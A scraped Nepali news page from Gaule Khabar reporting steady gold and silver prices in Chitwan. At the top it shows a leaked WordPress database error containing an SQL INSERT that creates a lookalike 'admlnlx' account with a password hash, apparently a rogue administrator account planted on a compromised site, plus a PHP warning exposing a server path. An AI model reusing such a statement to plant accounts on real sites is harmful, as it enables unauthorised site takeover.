WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvrjrgBc8JIw/Wrq.k7zRFuHRdwZNX/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 03:06:57', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सुनचांदीको मूल्य स्थिर, हेर्नुस कतिमा हुदैछ कारोबार – Gaule Khabar

सुनचांदीको मूल्य स्थिर, हेर्नुस कतिमा हुदैछ कारोबार

सुनचांदीको मूल्य स्थिर, हेर्नुस कतिमा हुदैछ कारोबार

चितवन,माघ २६-

साताको चौथो दिन बुधबार सुनचाँदी स्थिर छ। मंगलबार प्रति तोला ५५ हजार ८  सयमा कारोबार भएको ९९ दशमलव ९९ प्रतिशतको सुन आज पनि सोहि मुल्यमा कारोबार भई रहेको छ ।

त्यस्तै चांदी स्थिर रहदै प्रति तोला ८ सय १५ रुपैयाँमा कारोबार भई रहेको छ। नेपाल सुनचाँदी ब्यबसायी महासंघले आज बुधबार ९९  दशमलव ९९ प्रतिशतको सुनको मूल्य प्रति १० ग्राम ४७ हजार ८ सय ४० रुपैयाँ तोकेको छ भने प्रति १० ग्राम चाँदीको मूल्य ६ सय ९९ रुपैयाँ कायम गरेको छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका